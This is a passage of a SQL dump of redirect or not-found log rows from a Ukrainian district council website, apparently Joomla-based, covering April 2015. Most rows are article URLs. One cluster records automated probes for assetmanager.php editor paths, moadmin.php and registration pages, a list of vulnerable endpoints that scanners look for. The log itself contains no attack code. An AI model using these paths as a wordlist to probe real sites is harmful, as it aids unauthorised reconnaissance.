00:00:00',301),(12687,'http://www.malyn-rayrada.org.ua/index.php/548-upravlinnja-veterinarnoi-medicini-v-malinskomu','','','',30,0,'2015-04-07 11:20:46','0000-00-00 00:00:00',301),(12688,'http://www.malyn-rayrada.org.ua/index.php/876-sluzhba-bezpeki-informue','','','',42,0,'2015-04-07 14:10:37','0000-00-00 00:00:00',301),(12689,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=325:2011-05-20-16-14-21&catid=33&Itemid=66&lang=uk','','','',18,0,'2015-04-07 14:11:38','0000-00-00 00:00:00',301),(12690,'http://www.malyn-rayrada.org.ua/index.php/276-shhodo-pererozpodilu-subvencii-z-derzhavnogo','','','',43,0,'2015-04-07 15:00:35','0000-00-00 00:00:00',301),(12691,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&catid=38:--19122011-&Itemid=73&lang=uk','','','',5,0,'2015-04-07 15:34:29','0000-00-00 00:00:00',301),(12692,'http://www.malyn-rayrada.org.ua/index.php/511-vidpovid-korostenskoi-direkcii-zaliznichnih','','','',34,0,'2015-04-07 18:08:04','0000-00-00 00:00:00',301),(12693,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=327:2011-05-20-16-20-26&catid=33:-20052011&Itemid=66&lang=en','','','',4,0,'2015-04-07 23:52:29','0000-00-00 00:00:00',301),(12694,'http://www.malyn-rayrada.org.ua/index.php/313-ispanija-chempion-evropi-z-futbolu','','','',79,0,'2015-04-08 00:04:22','0000-00-00 00:00:00',301),(12695,'http://www.malyn-rayrada.org.ua/index.php/277-vikonannja-dohidnoi-chastini-bjudzhetiv-oblasti-za','','','',12,0,'2015-04-08 06:02:14','0000-00-00 00:00:00',301),(12696,'http://www.malyn-rayrada.org.ua/index.php/62-priznachennja-tizhnja','','','',33,0,'2015-04-08 13:48:33','0000-00-00 00:00:00',301),(12697,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=en&Itemid=0','','','',4,0,'2015-04-08 17:54:44','0000-00-00 00:00:00',301),(12698,'http://www.malyn-rayrada.org.ua/index.php/index.php?option=com_user&view=register','','','',2,0,'2015-04-08 23:50:26','0000-00-00 00:00:00',301),(12699,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=312:-2011-&catid=33&Itemid=66&lang=en','','','',47,0,'2015-04-09 00:58:29','0000-00-00 00:00:00',301),(12700,'http://malyn-rayrada.org.ua/index.php/117-zakon-ukraini-4050-vi-pro-derzhavnu-sluzhbu-nabere','','','',1,0,'2015-04-09 01:01:54','0000-00-00 00:00:00',301),(12701,'http://malyn-rayrada.org.ua/index.php/117-zakon-ukraini-4050-vi-pro-derzhavnu-sluzhbu-nabere?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:01:57','0000-00-00 00:00:00',301),(12702,'http://malyn-rayrada.org.ua/index.php/301-opriljudnennja-dohodiv-golovi-malinskoi-rajonnoi','','','',3,0,'2015-04-09 01:03:33','0000-00-00 00:00:00',301),(12703,'http://malyn-rayrada.org.ua/index.php/301-opriljudnennja-dohodiv-golovi-malinskoi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:03:38','0000-00-00 00:00:00',301),(12704,'http://malyn-rayrada.org.ua/index.php/372-pro-priznachennja-pozachergovih-viboriv','','','',5,0,'2015-04-09 01:03:53','0000-00-00 00:00:00',301),(12705,'http://malyn-rayrada.org.ua/index.php/372-pro-priznachennja-pozachergovih-viboriv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:03:56','0000-00-00 00:00:00',301),(12706,'http://malyn-rayrada.org.ua/index.php/403-verhovna-rada-vidklala-na-rik-nabuttja-chinnosti','','','',1,0,'2015-04-09 01:04:05','0000-00-00 00:00:00',301),(12707,'http://malyn-rayrada.org.ua/index.php/403-verhovna-rada-vidklala-na-rik-nabuttja-chinnosti?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:04:09','0000-00-00 00:00:00',301),(12708,'http://malyn-rayrada.org.ua/index.php/482-pro-nadannja-dozvolu-na-rozroblennja-proektu','','','',4,0,'2015-04-09 01:04:22','0000-00-00 00:00:00',301),(12709,'http://malyn-rayrada.org.ua/index.php/482-pro-nadannja-dozvolu-na-rozroblennja-proektu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:04:26','0000-00-00 00:00:00',301),(12710,'http://malyn-rayrada.org.ua/index.php/484-do-vidoma-vodiiv-neobhidno-zaminiti-vodijski-prava','','','',2,0,'2015-04-09 01:04:30','0000-00-00 00:00:00',301),(12711,'http://malyn-rayrada.org.ua/index.php/484-do-vidoma-vodiiv-neobhidno-zaminiti-vodijski-prava?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:04:33','0000-00-00 00:00:00',301),(12712,'http://malyn-rayrada.org.ua/index.php/510-vidomosti-zaznacheni-v-deklaracii-pro-majno-dohodi','','','',3,0,'2015-04-09 01:04:37','0000-00-00 00:00:00',301),(12713,'http://malyn-rayrada.org.ua/index.php/510-vidomosti-zaznacheni-v-deklaracii-pro-majno-dohodi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:04:41','0000-00-00 00:00:00',301),(12714,'http://malyn-rayrada.org.ua/index.php/521-gidrometcentr-povidomljae-lito-cogo-roku-bude','','','',5,0,'2015-04-09 01:04:45','0000-00-00 00:00:00',301),(12715,'http://malyn-rayrada.org.ua/index.php/521-gidrometcentr-povidomljae-lito-cogo-roku-bude?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:04:49','0000-00-00 00:00:00',301),(12716,'http://malyn-rayrada.org.ua/index.php/526-do-vidoma-vipusknikiv-shkil-opublikovanij-rejting','','','',3,0,'2015-04-09 01:04:53','0000-00-00 00:00:00',301),(12717,'http://malyn-rayrada.org.ua/index.php/526-do-vidoma-vipusknikiv-shkil-opublikovanij-rejting?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:04:58','0000-00-00 00:00:00',301),(12718,'http://malyn-rayrada.org.ua/index.php/751-genasambleja-oon-pidtrimala-teritorialnu-cilisnist','','','',5,0,'2015-04-09 01:06:11','0000-00-00 00:00:00',301),(12719,'http://malyn-rayrada.org.ua/index.php/751-genasambleja-oon-pidtrimala-teritorialnu-cilisnist?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:06:42','0000-00-00 00:00:00',301),(12720,'http://malyn-rayrada.org.ua/index.php/877-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-ta-rajoniv-oblasti-za-8-misyatsiv','','','',10,0,'2015-04-09 01:06:56','0000-00-00 00:00:00',301),(12721,'http://malyn-rayrada.org.ua/index.php/877-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-ta-rajoniv-oblasti-za-8-misyatsiv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:07:02','0000-00-00 00:00:00',301),(12722,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=en&Itemid=0','','','',1,0,'2015-04-09 01:11:27','0000-00-00 00:00:00',301),(12723,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-04-09 01:11:30','0000-00-00 00:00:00',301),(12724,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-04-09 01:12:20','0000-00-00 00:00:00',301),(12725,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-04-09 01:12:23','0000-00-00 00:00:00',301),(12726,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=38&Itemid=73&lang=en','','','',1,0,'2015-04-09 01:13:45','0000-00-00 00:00:00',301),(12727,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=38&Itemid=73&lang=ru','','','',6,0,'2015-04-09 01:13:48','0000-00-00 00:00:00',301),(12728,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-04-09 01:13:51','0000-00-00 00:00:00',301),(12729,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=38:--19122011-&Itemid=73&lang=en','','','',1,0,'2015-04-09 01:13:55','0000-00-00 00:00:00',301),(12730,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=38:--19122011-&Itemid=73&lang=ru','','','',3,0,'2015-04-09 01:13:58','0000-00-00 00:00:00',301),(12731,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=38:--19122011-&Itemid=73&lang=uk','','','',1,0,'2015-04-09 01:14:01','0000-00-00 00:00:00',301),(12732,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-2011-&catid=38&Itemid=73&lang=en','','','',1,0,'2015-04-09 01:14:04','0000-00-00 00:00:00',301),(12733,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-2011-&catid=38&Itemid=73&lang=ru','','','',1,0,'2015-04-09 01:14:08','0000-00-00 00:00:00',301),(12734,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-2011-&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-04-09 01:14:15','0000-00-00 00:00:00',301),(12735,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-2011-&catid=38:--19122011-&Itemid=73&lang=ru','','','',5,0,'2015-04-09 01:14:18','0000-00-00 00:00:00',301),(12736,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&catid=38&Itemid=73&lang=en','','','',1,0,'2015-04-09 01:14:21','0000-00-00 00:00:00',301),(12737,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&catid=38&Itemid=73&lang=ru','','','',4,0,'2015-04-09 01:14:24','0000-00-00 00:00:00',301),(12738,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&catid=38&Itemid=73&lang=uk','','','',8,0,'2015-04-09 01:14:27','0000-00-00 00:00:00',301),(12739,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&catid=38:--19122011-&Itemid=73&lang=en','','','',1,0,'2015-04-09 01:14:30','0000-00-00 00:00:00',301),(12740,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&catid=38:--19122011-&Itemid=73&lang=ru','','','',7,0,'2015-04-09 01:14:33','0000-00-00 00:00:00',301),(12741,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&catid=38:--19122011-&Itemid=73&lang=uk','','','',5,0,'2015-04-09 01:14:36','0000-00-00 00:00:00',301),(12742,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-2012-&catid=38&Itemid=73&lang=en','','','',1,0,'2015-04-09 01:14:39','0000-00-00 00:00:00',301),(12743,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-2012-&catid=38&Itemid=73&lang=ru','','','',1,0,'2015-04-09 01:14:42','0000-00-00 00:00:00',301),(12744,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-2012-&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-04-09 01:14:45','0000-00-00 00:00:00',301),(12745,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-2012-&catid=38:--19122011-&Itemid=73&lang=en','','','',1,0,'2015-04-09 01:14:48','0000-00-00 00:00:00',301),(12746,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-2012-&catid=38:--19122011-&Itemid=73&lang=ru','','','',5,0,'2015-04-09 01:14:51','0000-00-00 00:00:00',301),(12747,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11&lang=en','','','',1,0,'2015-04-09 01:15:10','0000-00-00 00:00:00',301),(12748,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11&lang=ru','','','',1,0,'2015-04-09 01:15:13','0000-00-00 00:00:00',301),(12749,'http://www.malyn-rayrada.org.ua/index.php/117-zakon-ukraini-4050-vi-pro-derzhavnu-sluzhbu-nabere','','','',77,0,'2015-04-09 01:20:15','0000-00-00 00:00:00',301),(12750,'http://www.malyn-rayrada.org.ua/index.php/117-zakon-ukraini-4050-vi-pro-derzhavnu-sluzhbu-nabere?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:20:24','0000-00-00 00:00:00',301),(12751,'http://www.malyn-rayrada.org.ua/index.php/372-pro-priznachennja-pozachergovih-viboriv','','','',11,0,'2015-04-09 01:21:34','0000-00-00 00:00:00',301),(12752,'http://www.malyn-rayrada.org.ua/index.php/372-pro-priznachennja-pozachergovih-viboriv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:21:37','0000-00-00 00:00:00',301),(12753,'http://www.malyn-rayrada.org.ua/index.php/403-verhovna-rada-vidklala-na-rik-nabuttja-chinnosti?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-04-09 01:21:44','0000-00-00 00:00:00',301),(12754,'http://www.malyn-rayrada.org.ua/index.php/482-pro-nadannja-dozvolu-na-rozroblennja-proektu','','','',35,0,'2015-04-09 01:21:52','0000-00-00 00:00:00',301),(12755,'http://www.malyn-rayrada.org.ua/index.php/484-do-vidoma-vodiiv-neobhidno-zaminiti-vodijski-prava','','','',124,0,'2015-04-09 01:21:55','0000-00-00 00:00:00',301),(12756,'http://www.malyn-rayrada.org.ua/index.php/521-gidrometcentr-povidomljae-lito-cogo-roku-bude','','','',16,0,'2015-04-09 01:21:57','0000-00-00 00:00:00',301),(12757,'http://www.malyn-rayrada.org.ua/index.php/521-gidrometcentr-povidomljae-lito-cogo-roku-bude?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-04-09 01:22:01','0000-00-00 00:00:00',301),(12758,'http://www.malyn-rayrada.org.ua/index.php/751-genasambleja-oon-pidtrimala-teritorialnu-cilisnist','','','',51,0,'2015-04-09 01:23:17','0000-00-00 00:00:00',301),(12759,'http://www.malyn-rayrada.org.ua/index.php/877-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-ta-rajoniv-oblasti-za-8-misyatsiv','','','',8,0,'2015-04-09 01:23:20','0000-00-00 00:00:00',301),(12760,'http://www.malyn-rayrada.org.ua/index.php/877-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-ta-rajoniv-oblasti-za-8-misyatsiv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-09 01:23:22','0000-00-00 00:00:00',301),(12761,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-04-09 01:27:01','0000-00-00 00:00:00',301),(12762,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=en&Itemid=0','','','',1,0,'2015-04-09 01:27:16','0000-00-00 00:00:00',301),(12763,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-04-09 01:27:23','0000-00-00 00:00:00',301),(12764,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=en&Itemid=0','','','',2,0,'2015-04-09 01:27:31','0000-00-00 00:00:00',301),(12765,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=en&Itemid=0','','','',1,0,'2015-04-09 01:27:46','0000-00-00 00:00:00',301),(12766,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-09 01:27:52','0000-00-00 00:00:00',301),(12767,'http://www.malyn-rayrada.org.ua/index.php/69-v-ukrainu-nadijshla-persha-partija-efirnih','','','',80,0,'2015-04-09 02:53:29','0000-00-00 00:00:00',301),(12768,'http://www.malyn-rayrada.org.ua/index.php/448-v-s-zhuravskij-budu-perekonuvati-svoih-koleg','','','',48,0,'2015-04-09 06:42:19','0000-00-00 00:00:00',301),(12769,'http://www.malyn-rayrada.org.ua/index.php/312-pro-nagorodzhennja-vidznakoju-prezidenta-ukraini','','','',50,0,'2015-04-09 09:09:34','0000-00-00 00:00:00',301),(12770,'http://malyn-rayrada.org.ua/wp-login.php?action=register','','','',1,0,'2015-04-09 12:13:43','0000-00-00 00:00:00',301),(12771,'http://malyn-rayrada.org.ua/wp-signup.php','','http://malyn-rayrada.org.ua/wp-signup.php','',1,0,'2015-04-09 12:13:45','0000-00-00 00:00:00',301),(12772,'http://www.malyn-rayrada.org.ua/index.php/595-pro-perenesennja-dati-sklikannja-27-sesii-rajonnoi','','','',59,0,'2015-04-09 18:26:02','0000-00-00 00:00:00',301),(12773,'http://www.malyn-rayrada.org.ua/index.php/512-ukrainci-z-nedili-budut-spati-na-godinu-menshe','','','',51,0,'2015-04-09 23:01:30','0000-00-00 00:00:00',301),(12774,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=714:2012-06-14-15-15-43&catid=43&Itemid=82&lang=uk','','','',13,0,'2015-04-10 06:57:47','0000-00-00 00:00:00',301),(12775,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=38&Itemid=73&lang=uk','','','',6,0,'2015-04-10 07:43:46','0000-00-00 00:00:00',301),(12776,'http://www.malyn-rayrada.org.ua/index.php/290-sklad-zbirnoi-ukraini','','','',22,0,'2015-04-10 10:53:55','0000-00-00 00:00:00',301),(12777,'http://www.malyn-rayrada.org.ua/index.php/838-upravlinnja-statistiki-u-m-malini-informue-3','','','',126,0,'2015-04-10 13:34:55','0000-00-00 00:00:00',301),(12778,'http://malyn-rayrada.org.ua/template/default/common/footer.htm','','http://malyn-rayrada.org.ua','',1,0,'2015-04-10 14:59:50','0000-00-00 00:00:00',301),(12779,'http://malyn-rayrada.org.ua/moadmin.php','','http://malyn-rayrada.org.ua','',1,0,'2015-04-10 15:00:17','0000-00-00 00:00:00',301),(12780,'http://malyn-rayrada.org.ua/moadmin/moadmin.php','','http://malyn-rayrada.org.ua','',1,0,'2015-04-10 15:00:19','0000-00-00 00:00:00',301),(12781,'http://www.malyn-rayrada.org.ua/index.php/1072-zustrich-iz-predstavnikami-teritorialnikh-gromad-kerivnitstva-blagodijnoji-organizatsiji-chornobilska-likarnyana-kasa','','','',13,0,'2015-04-10 15:22:05','0000-00-00 00:00:00',301),(12782,'http://www.malyn-rayrada.org.ua/assetmanager.php','','','',1,0,'2015-04-10 16:18:39','0000-00-00 00:00:00',301),(12783,'http://www.malyn-rayrada.org.ua/administration/scripts/editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:18:44','0000-00-00 00:00:00',301),(12784,'http://www.malyn-rayrada.org.ua/admin/is_editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:18:52','0000-00-00 00:00:00',301),(12785,'http://www.malyn-rayrada.org.ua/apps/ecms/scripts/Editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:18:54','0000-00-00 00:00:00',301),(12786,'http://www.malyn-rayrada.org.ua/innovaeditor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:18:56','0000-00-00 00:00:00',301),(12787,'http://www.malyn-rayrada.org.ua/commun/Editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:18:59','0000-00-00 00:00:00',301),(12788,'http://www.malyn-rayrada.org.ua/INC/GenericDB/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:02','0000-00-00 00:00:00',301),(12789,'http://www.malyn-rayrada.org.ua/js/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:04','0000-00-00 00:00:00',301),(12790,'http://www.malyn-rayrada.org.ua/plugins/innova/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:07','0000-00-00 00:00:00',301),(12791,'http://www.malyn-rayrada.org.ua/packages/portal/includes/js/editor/editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:10','0000-00-00 00:00:00',301),(12792,'http://www.malyn-rayrada.org.ua/editor/library/editor4_2_1/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:12','0000-00-00 00:00:00',301),(12793,'http://www.malyn-rayrada.org.ua/wysiwyg/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:15','0000-00-00 00:00:00',301),(12794,'http://www.malyn-rayrada.org.ua/administration/editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:17','0000-00-00 00:00:00',301),(12795,'http://www.malyn-rayrada.org.ua/directory/edt/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:20','0000-00-00 00:00:00',301),(12796,'http://www.malyn-rayrada.org.ua/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:23','0000-00-00 00:00:00',301),(12797,'http://www.malyn-rayrada.org.ua/yonetim/editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:26','0000-00-00 00:00:00',301),(12798,'http://www.malyn-rayrada.org.ua/Innovastudio5.5/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:28','0000-00-00 00:00:00',301),(12799,'http://www.malyn-rayrada.org.ua/templates/us/admin-panel/HTML_Editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:31','0000-00-00 00:00:00',301),(12800,'http://www.malyn-rayrada.org.ua/editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:33','0000-00-00 00:00:00',301),(12801,'http://www.malyn-rayrada.org.ua/admin/editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:36','0000-00-00 00:00:00',301),(12802,'http://www.malyn-rayrada.org.ua/kyoshobutiken/fc_util/Editor_5_5/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:38','0000-00-00 00:00:00',301),(12803,'http://www.malyn-rayrada.org.ua/src/azelastin/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:40','0000-00-00 00:00:00',301),(12804,'http://www.malyn-rayrada.org.ua/cms/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:43','0000-00-00 00:00:00',301),(12805,'http://www.malyn-rayrada.org.ua/innova-assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:45','0000-00-00 00:00:00',301),(12806,'http://www.malyn-rayrada.org.ua/cms/modules/articles/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:47','0000-00-00 00:00:00',301),(12807,'http://www.malyn-rayrada.org.ua/plugins/htmleditor2/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:50','0000-00-00 00:00:00',301),(12808,'http://www.malyn-rayrada.org.ua/Lib/editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:52','0000-00-00 00:00:00',301),(12809,'http://www.malyn-rayrada.org.ua/diymodule/Editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:54','0000-00-00 00:00:00',301),(12810,'http://www.malyn-rayrada.org.ua/rootadmin/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:19:57','0000-00-00 00:00:00',301),(12811,'http://www.malyn-rayrada.org.ua/scripts/iseditor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:20:00','0000-00-00 00:00:00',301),(12812,'http://www.malyn-rayrada.org.ua/admin/common/editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:20:03','0000-00-00 00:00:00',301),(12813,'http://www.malyn-rayrada.org.ua/generator/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:20:06','0000-00-00 00:00:00',301),(12814,'http://www.malyn-rayrada.org.ua/system/templates/modules/admin/editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:20:09','0000-00-00 00:00:00',301),(12815,'http://www.malyn-rayrada.org.ua/admin/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:20:11','0000-00-00 00:00:00',301),(12816,'http://www.malyn-rayrada.org.ua/~nga/Edit0r/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:20:13','0000-00-00 00:00:00',301),(12817,'http://www.malyn-rayrada.org.ua/inv/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:20:17','0000-00-00 00:00:00',301),(12818,'http://www.malyn-rayrada.org.ua/beheer/novosite_editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:20:19','0000-00-00 00:00:00',301),(12819,'http://www.malyn-rayrada.org.ua/sitemanager/protected/component/InnovaStudio-Editor/Editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:20:22','0000-00-00 00:00:00',301),(12820,'http://www.malyn-rayrada.org.ua/plugins/editors/innova/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:20:28','0000-00-00 00:00:00',301),(12821,'http://www.malyn-rayrada.org.ua/start/public/editor/assetmanager/assetmanager.php','','','',1,0,'2015-04-10 16:20:31','0000-00-00 00:00:00',301),(12822,'http://malyn-rayrada.org.ua/index.php/1072-zustrich-iz-predstavnikami-teritorialnikh-gromad-kerivnitstva-blagodijnoji-organizatsiji-chornobilska-lika','','','',1,0,'2015-04-10 19:55:52','0000-00-00 00:00:00',301),(12823,'http://www.malyn-rayrada.org.ua/index.php/842-informacija-shhodo-indeksacii-pensij','','','',62,0,'2015-04-10 22:42:40','0000-00-00 00:00:00',301),(12824,'http://www.malyn-rayrada.org.ua/index.php/325-ukrainci-perevedut-strilki-godinnika-na-godinu','','','',19,0,'2015-04-11 06:36:21','0000-00-00 00:00:00',301),(12825,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=851:-2013-&catid=46&Itemid=85&lang=uk','','','',57,0,'2015-04-11 07:06:40','0000-00-00 00:00:00',301),(12826,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=212:2010-12-15-14-49-15&catid=29:--15122010-&Itemid=60&lang=en','','','',55,0,'2015-04-11 08:40:55','0000-00-00 00:00:00',301),(12827,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&lang=uk','','','',28,0,'2015-04-11 09:43:34','0000-00-00 00:00:00',301),(12828,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=792:2012-10-17-06-26-37&catid=36&Itemid=70&lang=en','','','',4,0,'2015-04-11 10:19:46','0000-00-00 00:00:00',301),(12829,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&lang=ru','','','',2,0,'2015-04-11 10:21:39','0000-00-00 00:00:00',301),(12830,'http://www.malyn-rayrada.org.ua/index.php/817-kolektiv-rajonnoi-radi-priednuetsja-do-vitan','','','',56,0,'2015-04-11 12:19:01','0000-00-00 00:00:00',301),(12831,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=851:-2013-&catid=46:--21122012&Itemid=85&lang=ru','','','',34,0,'2015-04-11 14:28:42','0000-00-00 00:00:00',301),(12832,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&catid=45&Itemid=84&lang=en','','','',67,0,'2015-04-11 14:42:59','0000-00-00 00:00:00',301),(12833,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=714:2012-06-14-15-15-43&catid=43&Itemid=82&lang=uk','','','',14,0,'2015-04-11 15:05:54','0000-00-00 00:00:00',301),(12834,'http://www.malyn-rayrada.org.ua/index.php/1072-zustrich-iz-predstavnikami-teritorialnikh-gromad-kerivnitstva-blagodijnoji-organizatsiji-chornobilska-likarnyana-kasa?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-11 18:03:28','0000-00-00 00:00:00',301),(12835,'http://www.malyn-rayrada.org.ua/index.php?option=com_user&task=register','','','',3,0,'2015-04-12 04:08:45','0000-00-00 00:00:00',301),(12836,'http://www.malyn-rayrada.org.ua/index.php/joomla/other-components/registration-form','','','',2,0,'2015-04-12 04:08:46','0000-00-00 00:00:00',301),(12837,'http://www.malyn-rayrada.org.ua/index.php?option=com_community&view=register','','','',2,0,'2015-04-12 04:08:55','0000-00-00 00:00:00',301),(12838,'http://www.malyn-rayrada.org.ua/index.php/component/user/register.html','','','',2,0,'2015-04-12 04:08:55','0000-00-00 00:00:00',301),(12839,'http://www.malyn-rayrada.org.ua/index.php/registration/registers','','','',2,0,'2015-04-12 04:08:56','0000-00-00 00:00:00',301),(12840,'http://www.malyn-rayrada.org.ua/registratsiya/registers','','','',2,0,'2015-04-12 04:08:59','0000-00-00 00:00:00',301),(12841,'http://www.malyn-rayrada.org.ua/component/comprofiler/registers.html','','','',2,0,'2015-04-12 04:09:00','0000-00-00 00:00:00',301),(12842,'http://www.malyn-rayrada.org.ua/user/registration','','','',2,0,'2015-04-12 04:09:01','0000-00-00 00:00:00',301),(12843,'http://www.malyn-rayrada.org.ua/index.php?option=com_secureregistration&task=register','','','',2,0,'2015-04-12 04:09:03','0000-00-00 00:00:00',301),(12844,'http://www.malyn-rayrada.org.ua/component/option,com_comprofiler/task,registers/','','','',2,0,'2015-04-12 04:09:06','0000-00-00 00:00:00',301),(12845,'http://www.malyn-rayrada.org.ua/index.php?option=com_registration&task=register','','','',2,0,'2015-04-12 04:09:07','0000-00-00 